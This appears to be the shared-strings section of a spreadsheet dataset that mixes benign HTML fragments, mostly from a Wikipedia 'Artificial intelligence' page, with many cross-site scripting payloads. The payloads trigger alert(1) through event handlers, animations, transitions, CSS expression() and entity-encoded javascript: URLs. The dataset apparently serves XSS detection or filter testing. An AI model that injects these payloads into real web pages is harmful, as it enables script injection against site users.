    <t xml:space="preserve">        &lt;script src="_static/jquery.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;nav id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/nav&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onpointerout=alert(1)&gt;XSS&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onpointerup=alert(1)&gt;XSS&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;footer id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-382"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-382"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>STYLE="width: expression(alert(''))</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=38" title="Edit section: Finance and economics"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;sub id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;caption id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="External_links"&gt;External links </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015187-220"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015187_220-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;svg ondragover=alert(1) contenteditable&gt;drop here&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;kbd id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/kbd&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;q onload=alert(1)&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;input3 onpointerup=alert(1)&gt;XSS&lt;/input3&gt;</t>
  </si>
  <si>
    <t>&lt;div class="mw-references-wrap mw-references-columns"&gt;&lt;ol class="references"&gt;</t>
  </si>
  <si>
    <t>&lt;title onpointerdown=alert(1)&gt;XSS&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;video autoplay onplay=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;table onpointerover=alert(1)&gt;XSS&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;table draggable="true" ondragleave="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;i onkeypress="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;span draggable="true" ondragenter="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;thead draggable="true" ondragstart="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Knowledge_representation" class="mw-redirect" title="Knowledge representation"&gt;Knowledge representation &lt;/a&gt; and &lt;a href="/wiki/Commonsense_knowledge" class="mw-redirect" title="Commonsense knowledge"&gt;Commonsense knowledge &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/0.22/"&gt;0.22&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;optgroup ondragover=alert(1) contenteditable&gt;drop here&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div id="mw-content-text" lang="en" dir="ltr" class="mw-content-ltr"&gt;</t>
  </si>
  <si>
    <t>&lt;ol draggable="true" ondrag="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;slot draggable="true" ondrag="alert(1)"&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup id=x tabindex=1 onactivate=alert(1)&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;span&gt;More </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;sup id="cite_ref-134" class="reference"&gt;&lt;a href="#cite_note-134"&gt;&amp;#91;131&amp;#93; &lt;/a&gt; &lt;/sup&gt; This is attributed to the fact that, unlike checkers, physical dexterity has been a direct target of &lt;a href="/wiki/Natural_selection" title="Natural selection"&gt;natural selection &lt;/a&gt; for millions of years.</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 17.4 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=The+Museum+of+Modern+Art&amp;amp;rft.atitle=Thinking+Machines%3A+Art+and+Design+in+the+Computer+Age%2C+1959%E2%80%931989&amp;amp;rft_id=https%3A%2F%2Fwww.moma.org%2Fcalendar%2Fexhibitions%2F3863&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;wbr onmouseout="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;div class="section" id="all-the-rest"&gt;</t>
  </si>
  <si>
    <t>&lt;rp onpointerup=alert(1)&gt;XSS&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;footer onbeforepaste="alert(1)" contenteditable&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;tbody id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=34" title="Edit section: Evaluating progress"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;nav onkeyup="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/New_mysterianism" title="New mysterianism"&gt;New mysterianism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;content onkeydown="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;269–271 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;basefont id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;listing onpointerover=alert(1)&gt;XSS&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Embodied intelligence </t>
  </si>
  <si>
    <t>&lt;rt onmouseover="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Plato" title="Plato"&gt;Plato &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hr onpointerdown=alert(1)&gt;XSS&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dialog style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;listing onbeforecut="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dd ondrop=alert(1) contenteditable&gt;drop here&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;span class="nowrap"&gt;&lt;a href="/wiki/National_Diet_Library" title="National Diet Library"&gt;NDL &lt;/a&gt;: &lt;span class="uid"&gt;&lt;a rel="nofollow" class="external text" href="https://id.ndl.go.jp/auth/ndlna/00574798"&gt;00574798 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;mark onmouseenter="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Neurophenomenology" title="Neurophenomenology"&gt;Neurophenomenology &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onpointerout=alert(1)&gt;XSS&lt;/datalist&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Natural_language_processing"&gt;Natural language processing </t>
  </si>
  <si>
    <t>&lt;optgroup id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;xmp id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;ol onmouseover="alert(1)"&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;textarea oncopy=alert(1) autofocus&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;select onbeforepaste="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;object onbeforecopy="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Knowledge-based_systems" title="Knowledge-based systems"&gt;Knowledge-based systems &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Dr. Know (&lt;i&gt;&lt;a href="/wiki/A.I._Artificial_Intelligence" title="A.I. Artificial Intelligence"&gt;A.I. Artificial Intelligence &lt;/a&gt; &lt;/i&gt;, 2001) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;textarea id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;data onload=alert(1)&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt; &lt;a rel="nofollow" class="external text" href="https://ars.electronica.art/center/en/exhibitions/ai/"&gt;Retrieved September 2019 https://ars.electronica.art/center/en/exhibitions/ai/ Retrieved September 2019 &lt;/a&gt;&lt;span class="cs1-visible-error error citation-comment"&gt; Check &lt;code class="cs1-code"&gt;&amp;#124;url= &lt;/code&gt; value (&lt;a href="/wiki/Help:CS1_errors#bad_url" title="Help:CS1 errors"&gt;help &lt;/a&gt;) </t>
  </si>
  <si>
    <t>&lt;h1 onpointerenter=alert(1)&gt;XSS&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;small onpointerdown=alert(1)&gt;XSS&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;select onmouseout="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;div onpointerenter=alert(1)&gt;XSS&lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-228"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-228"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;object id=x onfocusin=alert(1) type=text/html&gt;</t>
  </si>
  <si>
    <t>&lt;object id=x onfocus=alert(1) type=text/html&gt;</t>
  </si>
  <si>
    <t>&lt;li onbeforepaste="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;bdi style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;caption oncontextmenu="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;strike onblur=alert(1) tabindex=1 id=x&gt;&lt;/strike&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;thead id=x tabindex=1 onfocus=alert(1)&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;rtc onload=alert(1)&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, p.&amp;#160;188. </t>
  </si>
  <si>
    <t>&lt;dfn ondblclick="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Information_system" title="Information system"&gt;Information&lt;br /&gt;systems &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onmouseleave="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onmousedown="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;output id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;details draggable="true" ondragend="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mathematical_analysis" title="Mathematical analysis"&gt;Mathematical analysis &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTELungarellaMettaPfeiferSandini2003-169"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTELungarellaMettaPfeiferSandini2003_169-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;content onmouseover="alert(1)"&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Avicenna" title="Avicenna"&gt;Avicenna &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig (2003) &lt;/a&gt; (who prefer the term "rational agent") and write "The whole-agent view is now widely accepted in the field" (&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;55). &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;menuitem ondrop=alert(1) contenteditable&gt;drop here&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Existential_risk_from_artificial_intelligence" style="padding:3px"&gt;&lt;table class="nowraplinks mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="2"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science&amp;amp;rft.atitle=Superhuman+AI+for+heads-up+no-limit+poker%3A+Libratus+beats+top+professionals&amp;amp;rft.pages=418-424&amp;amp;rft.date=2018-01-26&amp;amp;rft_id=info%3Adoi%2F10.1126%2Fscience.aao1733&amp;amp;rft.aulast=Brown&amp;amp;rft.aufirst=Noam&amp;amp;rft.au=Sandholm%2C+Tuomas&amp;amp;rft_id=http%3A%2F%2Fscience.sciencemag.org%2Fcontent%2F359%2F6374%2F418&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_psychiatry" title="Glossary of psychiatry"&gt;Psychiatry &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;sup onmouseleave="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Reasoning-88"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Reasoning_88-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;h3 id="p-personal-label"&gt;Personal tools &lt;/h3&gt;</t>
  </si>
  <si>
    <t>&lt;nav onpointerdown=alert(1)&gt;XSS&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Dartmouth_conference-31"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Dartmouth_conference_31-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;bgsound onload=alert(1)&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onpointerenter=alert(1)&gt;XSS&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Natural_language_processing" title="Natural language processing"&gt;Natural language processing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;b ondragover=alert(1) contenteditable&gt;drop here&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Artificial_intelligence_(video_games)" class="mw-redirect" title="Artificial intelligence (video games)"&gt;Artificial intelligence (video games) &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-200"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-200"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;multicol draggable="true" ondragstart="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onmousemove="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;body onbeforecut="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/E-commerce" title="E-commerce"&gt;E-commerce &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;basefont id=x tabindex=1 onactivate=alert(1)&gt;&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;i id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;var onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/var&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20141129044821/http://www.aaai.org/Library/Symposia/Fall/fs05-06"&gt;"Machine Ethics" &lt;/a&gt;. &lt;i&gt;aaai.org &lt;/i&gt;. Archived from &lt;a rel="nofollow" class="external text" href="http://www.aaai.org/Library/Symposia/Fall/fs05-06"&gt;the original &lt;/a&gt; on 29 November 2014. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=aaai.org&amp;amp;rft.atitle=Machine+Ethics&amp;amp;rft_id=http%3A%2F%2Fwww.aaai.org%2FLibrary%2FSymposia%2FFall%2Ffs05-06&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;command onpointerenter=alert(1)&gt;XSS&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;embed onbeforepaste="alert(1)" contenteditable&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/List_of_programming_languages_for_artificial_intelligence" title="List of programming languages for artificial intelligence"&gt;Programming languages &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Applications </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt; – it’s got answers to some common questions.&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;input onpointerdown=alert(1)&gt;XSS&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onclick="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;wbr oncontextmenu="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/0.24/"&gt;0.24&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onbeforecut="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;template onpointerover=alert(1)&gt;XSS&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;title draggable="true" ondragend="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;With social media sites overtaking TV as a source for news for young people and news organizations increasingly reliant on social media platforms for generating distribution,&lt;sup id="cite_ref-297" class="reference"&gt;&lt;a href="#cite_note-297"&gt;&amp;#91;286&amp;#93; &lt;/a&gt; &lt;/sup&gt; major publishers now use artificial intelligence (AI) technology to post stories more effectively and generate higher volumes of traffic.&lt;sup id="cite_ref-298" class="reference"&gt;&lt;a href="#cite_note-298"&gt;&amp;#91;287&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;sub onkeypress="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;del draggable="true" ondragend="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;head oncut="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;ul onpointerup=alert(1)&gt;XSS&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;u onpointerout=alert(1)&gt;XSS&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;applet draggable="true" ondragstart="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;i oncut="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKahnemanSlovicTversky1982" class="citation book"&gt;&lt;a href="/wiki/Daniel_Kahneman" title="Daniel Kahneman"&gt;Kahneman, Daniel &lt;/a&gt;; Slovic, D.; &lt;a href="/wiki/Amos_Tversky" title="Amos Tversky"&gt;Tversky, Amos &lt;/a&gt; (1982). &lt;i&gt;Judgment under uncertainty: Heuristics and biases &lt;/i&gt;. &lt;i&gt;Science &lt;/i&gt;. &lt;b&gt;185 &lt;/b&gt;. New York: Cambridge University Press. pp.&amp;#160;1124–31. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1126%2Fscience.185.4157.1124"&gt;10.1126/science.185.4157.1124 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-521-28414-1" title="Special:BookSources/978-0-521-28414-1"&gt;&lt;bdi&gt;978-0-521-28414-1 &lt;/bdi&gt; &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/17835457"&gt;17835457 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Judgment+under+uncertainty%3A+Heuristics+and+biases&amp;amp;rft.place=New+York&amp;amp;rft.pages=1124-31&amp;amp;rft.pub=Cambridge+University+Press&amp;amp;rft.date=1982&amp;amp;rft_id=info%3Apmid%2F17835457&amp;amp;rft_id=info%3Adoi%2F10.1126%2Fscience.185.4157.1124&amp;amp;rft.isbn=978-0-521-28414-1&amp;amp;rft.aulast=Kahneman&amp;amp;rft.aufirst=Daniel&amp;amp;rft.au=Slovic%2C+D.&amp;amp;rft.au=Tversky%2C+Amos&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>Biological intelligence vs. intelligence in general:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;figure style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dd ondragover=alert(1) contenteditable&gt;drop here&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cuckoo_search" title="Cuckoo search"&gt;Cuckoo search &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;title oncontextmenu="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onmousedown="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;figure onmouseout="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;track onkeydown="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onpointerover=alert(1)&gt;XSS&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&amp;#x3C</t>
  </si>
  <si>
    <t>&lt;noscript onkeydown="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;blink oncontextmenu="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;details draggable="true" ondragenter="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;noembed id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;form onpointerdown=alert(1)&gt;XSS&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;option onmouseover="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;option style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;script onload=alert(1) src=validjs.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;legend onmouseenter="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;track onmouseup="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computer_accessibility" title="Computer accessibility"&gt;Accessibility &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
